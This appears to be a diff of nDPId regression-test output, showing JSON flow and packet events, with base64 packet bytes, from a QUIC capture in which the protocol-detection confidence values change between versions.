{"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621425516873,"flow_last_seen":1621425516873,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431309055,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"202.152.155.121","src_port":55273,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431309055,"flow_last_seen":1621431309055,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431309055,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":63136,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"suggestqueries-clients6.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621425498439,"flow_last_seen":1621425498439,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431309055,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"251.236.18.198","src_port":44252,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621425516873,"flow_last_seen":1621425516873,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431309055,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"202.152.155.121","src_port":55273,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431355629,"flow_last_seen":1621431355629,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431355629,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":51456,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1621431355629,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431355629,"pkt":"AAAAAAAAAAEAaACzCABFAAVipRBAAH4RM2+okEAFZsLPs8kAAbsFTgz5x\/8AAB0Ipr6cuikmNEMAAEU0i0hH+cAdz5ZZK\/xgszII4NJ+Cs\/TRSxsD\/59bGzAHONnn6j+X3amElYhYMo+go49s13dC+nlDHUdymxgbgfhGCJjdyT9TzcGgD1HhFldjuPuqaUqb2U+e5hIm7ZwKR4IiSdw5myr6wLeQGKnRWRznbKdv0\/S8qhtnacEzUWkRbgLNZB6UrIuIb3\/XF61ze+uu1oQFMqs\/98rtD2Gush\/bOd4PCp75DHjTM7vEePRlMktunxdIh3uhOzgWNKSQKJT0NAyTU7NxzeiF3GfRej2\/kZ85CVwTrCrF16rxPwjm9ETk7onwTP2SJN9jSLLXtE8HLoGNVYKwKhEtDy7juZS+ZzakAkwGM40iWULaV8JHp3tnl4HFGHlYIam6j9\/x\/pkFvR97oZ4wzOV8R3kk4Ra7CeuS8G446n4JShwKYpq8P1sEbgLA0Q+fIXUmPEN7zq\/oW\/SjwuvXJSpkHba6nxwXOq9T2kwGi2sisBu9OUPhX+jksGDs7ufRR3uLnbqZloU9ve7ujWkOVy8l0mz6YekjKqsAnkn1AHXrNbiuNq3lfNWMOdFJMSCZVvRNOSxLp0vTEGoqQhPMALOnaZWkaB\/IYt22cFqUAekqyAVUEGfqiGt6h9rCpzV8lGyjNf1CoZnWFNQvZHRcUd0E0mwSijEO\/8qx\/3uH7V1emFiAJLB37Dab2xZnuNuUQ5y+bJoqPPXPlpeEf9N2vgb4V1z5g\/MMBLG41lXjcqJeJWiZvymJ1H3KCTyAX75xQGo9dFLeD8l8p7GaWhBKf6VVbpWbM2nvE4+lRC2IaGF4F5M+5QC4RODSGaHlCcroOJfhkPdPiQrLTk\/7S0AiJhOEEoxKs5rmjMJWHbOhMEmV2Uqjkwlipc94JjyYJ2kxfN3X0UT\/S4dmpbMytDlXm2P3piCB\/MLrm+e9saulhmLDTxI5H7sCO9NK8mugUOQqCu4A60KTwRUiaJW97RDku8KM7tNRUwdkA7m4N6y8rHQhIH4ocpzig55LxPWT5XZqJmtqcBDZzFQl61yCq0MRPJez5meDXJITVqsdC8fAKML2\/9BBA6p2fme6P1rzQPoj+L2OOAcsG1lD15uPkM7J4XMlnbWRKz5t+5U5cCLF\/FyZV6ikFZeMEUbfhZVFVez5O0b7ArQykKFskvw5ow0nPTWFs3RhbSkruVVy+CP7T20ld2Zoo3waO1CAhdyywLs+WjgaBeB6BJYKM6gxS4fW8wzOgcaq4G2GqkD3m4pZqaaELLxGOxDCmCzO0QCG9M6jpfPOKsOfPc5ynpr4aPju6JGtl\/z+IPQNUX6dMyprmtEVvzlezA5hXv1FOS9Bu3pJnoRf0c1aYbjlC2uFltDff+w4\/xv44mcnP49XC51ZyX8YG\/WwlTNT+Q+PSx8mlKvW7CnX5u232hGz8LR+K7zeWVVpOleSv30hmVlH6Y4OuVkNecB2PlodVOjeqdjRSRxqRsLbcqLCC9cOmgjc\/ohryRRJQyMJtXeWbDrdqNKdq1pDxsuJ4wwMBMesHq4H0mEc4PlhC8w6AbhwgQpeeSZn5X2ZrFQy5Ipg3+vRKwYL\/Mi3kjrs2fSPNxarNRLlKyoY7f4hw2NjTzNWp0j2aXeNoKqTjDtXyit70tR4YqLzkn9C0xp0mUo9nxF4EWJdmjCX0ANdhrJMcQX5aRmmU+t3M1w1Bgicj3DEsU\/1FRB7DjmpdgCWCW4r5M6W6LkewBSsNiNSC3DnsTbf6eTU4wOue5\/0G7VJOcj6q0duKzEYYTXcoYAbuKiXnvE4OcU"} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431355629,"flow_last_seen":1621431355629,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431355629,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":51456,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431355629,"flow_last_seen":1621431355629,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431355629,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":51456,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431369135,"flow_last_seen":1621431369135,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431369135,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":63163,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02318{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1621431369135,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431369135,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+m5AAH4RGJmokEAFcfqJ8\/a7AbsFTuukwf8AAB0IwkoI2nuQHYUAAEU01K7fN93B4MUASGiXGUyARwSY+4aO68HNYjEt7GWPzfJckCAv1T4i5dLLPnKrxPNl7uR\/wsXzoosnnjNfCeM6JnFogGoD8Fd67g3pBz\/4xd9MrHK8spfp0sKR5PgUqqWOgvCutevbQ8qYXNVgijT5\/8AiGcOOHWAx5JOe9WKc+HYLYWnuE5L3HEZQo4nrWEMko3D15BJbkyW22cYvauBzrX7Zq2OYwnKGwfvfdTYQGFwBMKheaRrgDFFEbI95H6nND\/F7o65wah9YFCBHrCZCULES1ZD7GJY\/Bqf\/MjcEld0g3C+HvcIVjENbzsXizvCuDmTJV9YcPMpv9s382puliOWP4gOQWgoAG3Ao6cfEvPQFaiuvHkR1sXIVJDapx4gQAa8qedAjI4Qk9A2tznfUat8eb5YjNDd00djuz1xXJ1+7\/xnEryQeYx5B9q0Yh4cp1f8Mpm8PkVLPsaI5EJD7Bo2TjORoihUYfLnocxxlk+mWTWVOcQW\/cjslUg1\/uOKIPppK9Zo0xPvYv4LI237JcA2TOoJFeS2HbNf22y6wRXsJR7Z1jYbJCoLzvh8chtuZ6AA0Jcfp8DQO6eEIRfW\/h5uscIqr7vrdGBDh5\/zvBHXMvSXwUSNMs9ju24jzW8z9yJsqxVYmitvQJ7dOrLH\/K5mn71oTWSfLy9yPsyJGefj4rQHs6usmcTj3v05Oe+rdTxkAwaXEjfHjw7A18cRPFLq1e7XPVF15OaAIZGGJW+X9C6SnLNTHrGmlAeBe5bF1NxyJ8XbUSvQBp1NyQhLMJ6GHeTnqG2+oKcMtLlDqhrjxBcqwGzBORNaeIk37oEDvRj2ULgb1Cu19EZ8tiMvhQaCqwm6eg\/krsi8k4E\/id\/90KGowDX\/Pr\/s1sAND5Dh+Md7iwKz3tFkcVqiC9XKQGYvwvrNl3M\/DVbx88F8Mq1fhBPFp75j4duggfbVz4fePFTUYQyXEdkFrbprYYprY3G2nbXPGgbmp+\/keXeMNgYEi7eCqoK5MGIiI5kYO52LEu7uBHu6gfW0a\/oN3u8Hg87YiAKF6G4HUNDN7ak+kYj0Gg+8\/osNPKdMNnn3Ttq+e4FpeaVuPQtri+1\/ozlT88MEsTrI4ZjcLkQrdsDGrSk5pFNuuaNdnBxmLTD9+Y31TuPjZdF3y8aerRjGjcKA924zFY6F3+erxKilvfVdWBBMq\/sZv6Vksw\/+Fz1wttZxo9VEZshnZyBhQtfaWNbpCUMCLWSIOTygpzB56\/djZxzMToQ0OTov79H21iuzt9kW26NuI44K+W4r3zJK44FZlurMlKsoEREV+b\/FORcM8avXBcW20SB9dZBdfAIWoFzST8hpkmnW5KzJkqUXpqJQJHsur9uW7QvcJJs3nF\/XtsYVO7wfuWlEoUZSI7JS9k\/vtrqWVy2X+CigTWqjVYJhzagu87STW7dgMdyFPWLSjmBjeACNJOqSiLuLI6nqP7AToDkXf2o2wX1ea4tL+l2elnz8UUQ0mwPbx3D2flZoxja8QhG\/H0Dkv\/zqHUfQXS1ey7dOzI0gQWGL2bong5dY9vIH\/KH\/EE5WN9+MZTB5oOqSTzGQ0G10wtkmcpl7cceFjmLyC\/CPGRf1WcWpg0St7TVzKyiD9jSy7E7M+Mef3DDpD6ufY+IM3YsYXJiOqBLz9Mad7YJnU4xywy8xIlHMAZnyk840yn2AImi8yGcKAuOx8ekNKD\/3YSrti2Nd30LJbAbXW+9aUyCWGxhaYhZKKyYrgwwNNaQQ6T+r69Xv\/AhEpDvcH"} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431369135,"flow_last_seen":1621431369135,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431369135,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":63163,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"update.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431369135,"flow_last_seen":1621431369135,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431369135,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":63163,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"update.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370645,"flow_last_seen":1621431370645,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431370645,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54016,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1621431370645,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431370645,"pkt":"AAAAAAAAAAEAU0VlCABFAAViMu9AAH4RJlaokEAFmWIcTtMAAbsFTkg1z\/8AAB0I+lN8UldDPwoANwCkKLl+3h3UHIQgS3vcwcXrZ6T5hiytz4Q4TWQ7pmsAJO5xTHpseYqRKlKHmxme9TRfa47qWTNE\/T2kS0vQRKN+NvKsLSu+R20pLtVijhGmejNVjxQkpOqlEUNcFIHcN2wzhOdXdZI9UF3VUhNkOijfbeykwXjQP1\/nKm9mO0G\/ypc7Y2OQX8KQjJvTKmxfJgoiRMmIZd66ehWzpVA7ADDpyDredKxOTaDSAYoR9nNN9ch6nx3ZMTTXTycMrWty+BPeuRbrkASH1HytOMULRsu12u6n42QgaeYSvJl7RKIje\/FCPE4VKoS2bBqDGJdyFYhy9WpCdBYHFXRsvzage9S\/AuIhACnspXakPoSAAKTsCYsy7O8Xfk5D9YcZNZIWuP2P5LmgHVsAyYCWuB0zDz\/P\/niv7vxRu76Gc2OqQjwDwC1yI28dLAM1\/qVCYRFk9YMbF\/iD7Nsy5jvI9F\/PUuc57iiKLeU\/x1YGOwxmbb1YAjhXgnTaAuvlp4rcuFTF\/jkRDZDwvS0ElQbZ1sDIOXoAhaFOvXD0EKhqtqXAu8QvhDZA4eNLtzEFYCKh+iIymyxHd3zWX+3NxjMpE9Ns6UHSd84eMRpZcGmgG02e\/nW7OJALJ0IxLfndoUAlJk4IvuZcxngA9k\/unBNCOAlRVhFhhDnD4zD9WKXcfMQ8zOFHhmGS13WBEjy7kK3uLOIS3qui39MawSxNS7Ml6mSKoaSyb4+SNDLXoJWz3B44z0+hVh4WwxeJPSZ7w0VPVgCLDMcbCK1ByAz8JXWCFN83+GTRF5hMdm4dISfNt7qLcE3DH5CsDA+yUGakDromNlDnPMXyFA3nBYHp4IXGe9Qb9ePX1Y\/SndfWnyp3BEETdFg9vGIGsMMkmqU+J5mYsWQmYX5\/h7SfM4llXroWubSp8gBiYn3ZEiVxAgaNGqIripZvwoMsqPR8pCBgu6y3F8BYlwrVh+ZxYeOX5ab1qs+HTR\/VqeeVG8Eay\/MH5IQteK\/x80AjKjDmsExVlZ9Yvq1ASQtfskSMH0GMY9POIkrjW7EvJxN5wK\/qGiieo8H6mYS7uXrxZHkGc68vVyNWX9p3QoffUgaN1rL++0wS2CIvPmNLRJCwPEEWdTb37V1X6bBSAYmxZUUOT8oUGnsozk6dfMeAsBVRYGBaFG9+Y1uHxPYwvKwCvo+pVvLyi9jA\/MUPqdH5HKAlVkIxZHfTN0TbmkKqYM1+\/dGw42Opggft9Ujn+E6Te2o7P21d6\/4ziedAj7hW\/ducyroIUruOxK6kZkZIfc1rfDtpstdc1OwhsM8efvN8mSqQCgneDcWSXy4bE3JNAWNwVmsvgrlZnik2Id38oh\/fD8oub9PI\/kmIUiP1uSKBBkJyEnZ\/+uDpCaSemLo73IkSmAKSVsNdykI61VqMLJEb+fNx3Qf\/\/ppmJTj9\/JSXpVaRHvFY4L8IDk53+jFdIKFjZmAbMyUI5v3Br8tILw49LDtUwMV8TUdpFD45PjvSQ+YyqLq+OuacdGaLpMcBrUOmuMqWWPYG89KlxtPyViKOZQDTS8sb2EBEHN8hGk3fUXt1bo+FE8NSXvIg7NRqP5Nv3yrdaqPCA7cxMCsT0Z4cAs4COX\/fJ4v3Qpyc7hbzFiy9BZYDLGPjdm9XGzS14zLvvjA8ujJQXVu8\/cqxKCkP5AWXvVW61iwAkR3yFCXIjI79f5ml9EjzFluSxM8yINcpyXkiGxaLUSehYQkeNBr1bVFEIJq2IJOjgn8tdoygPZ\/Ggtxsz4Ympsa29lLPp\/1R"} -00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370645,"flow_last_seen":1621431370645,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431370645,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54016,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370645,"flow_last_seen":1621431370645,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431370645,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54016,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370796,"flow_last_seen":1621431370796,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431370796,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.42.133.245","src_port":51248,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1621431370796,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431370796,"pkt":"AAAAAAAAAAEAWIVLCABFAAVimjxAAH4Ri5mokEAFYyqF9cgwAbsFTgeRwv8AAB0Iy4aUElydjLEAAEU0cgy7g6waI4s\/Db31CXMNLtpBLCBMqbNNIERpncwoj\/mzw930r9KSGtTDq0Un\/reM90\/o2LMUXhAxGEjpV8kM2isFWzwDO4KLtdnvjoVU\/jW5X1cAIJGi224o+IBoqe\/q3MhszxPlHqwkUkoHgcWP8rFY11sIccKhMsLy4OlgMZHEtOM9cK6MhXXnbI4PIfeHbKw3eQF9bmAITBhN2hEUuCQ5tkEGA44Ny7kWGmEH8N+oonqrQFSRfhvaY3aPSuVRpbZIPtuPu5FfCgb9SlrhiL+YFIGOqSPYS1Fga7DZceldELqsQnht1L6sPyvDZGhFHGevrPqJKYsG5AJ1dz0CBKyRoEBiPDMdvlFISahZktRsu1zHBcqXO6dH\/i8qaCuLB3C0cU7Mf84KfPTeo\/gsTws0xYHHMgBbeLbnL3UFA5r6TMOj9bItn6l59owKGAThBrdETsc3kNqb2EaYZyfxOIPnMT50EN3E5+o1NkgWuOzUcI4wNbi\/tPHdtNay4zsdQpx+v0mHMwKaNOaS1cXTI5EglEP9nh0+7Pd14q0LRBQ3DeciSithO1E4K1W\/Z4sWicTGPnlHMSkhRPDqwcMrqZYI65EaAXb2hwQHTLQOC3yEOm8uj32O6iPw1kmWecebjTAhzoITApAhOJNqbhOhmL3LYzlMNpCxKIbZWwXYI7KE\/nyX+9ktlfBgqL7lMUB\/nzCvI8L8RT\/TyhNdGRodyYga3YaHfnznNluGiCWRkzVsHTXG5IbNbGj69KA73CTFlz3wgsOw1uHC\/q3RChP7l2qOfWKIMtxcvHriXoLF\/vYMzoqEm8pCiWCoZMnY39DH0b5dzrRQCWGNuyliasUzdNwfCWtlCp7bb4qxiMpsXc+uNU+g2bw+VTTlx1U6pmIskkdKx+mP5J+pvDAUA8T3JVvzUY7NyB8IEQ0IbbpFr4IAdnh2CDfm\/3LkeBAfOpK4ISFWDT\/Zq8xGBrTh4yq\/7VJSuZCIU6mdUPZvVTVYBmdKXePmLICT7JVQHsyS6MxIt1eR8vw5vXsNJo11Hj6NXO8R3qnkStwD3Hp1s8H3wRtuYv0txfoYvO+JQlg0ebqSA11uOBMpoISeySuHozQ8oCCsnJndgourEdZSSgF1xkc5zlxohntckX9YYRJuzAJGjDN4T1wfrPFQyenplFLZHMDpAhiV7Te3CCs6SKS28MBI6cwMwV1jZ4JX4bfrUb5Sbdar5XQqw9SbBJFJJmemfZlNvZabnR9m9F8aNRgxnvKtrT\/oN6gP7nsRQo4l8nySxze1hd0tyD8+tMuNQJRNnwq\/z6am\/OObDrBsZm3FIBJGoG3zuBmWjHfo9F91ajEKf3cpkFlxxZkkSD9hD9i3XpaytXko+K4WOBWAhjq6wftsLdQLBpeCv6ZMwSeTt2tPaiX6D3HlJiyhzzjMup+ygJV6xano1oW2u\/3nyWiYV0GHV+b5y0lkHYM1dgiTaT2KrSOD3IRFXFcs9y8cNjsa5kJDBFFwGRXnrEEfcCFRxk12riHmlcId3GMVfy4P0YANskdNyw2M+xiEcOkt6DL850Uen9ExlETBFpaBh9C+ABSY+1ty8tYaL3zfMeNRiFgkNZZN1r942JOKKotMtpCq+6AVsdDiJcE3TtG4YJZ2yTO5bCLeezzQEhXvpEnuAz6dq59BUrxZNWOqZ8HHhEXq3N82ukDRJgBUvK0NQJTyZjgLcV\/Y6DWk0EO9WY2nkKr38\/Agezi3TaatfB4TRt19446lztdcfJd7DYB6DWTlmwbRMquv"} -00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370796,"flow_last_seen":1621431370796,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431370796,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.42.133.245","src_port":51248,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gcp.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 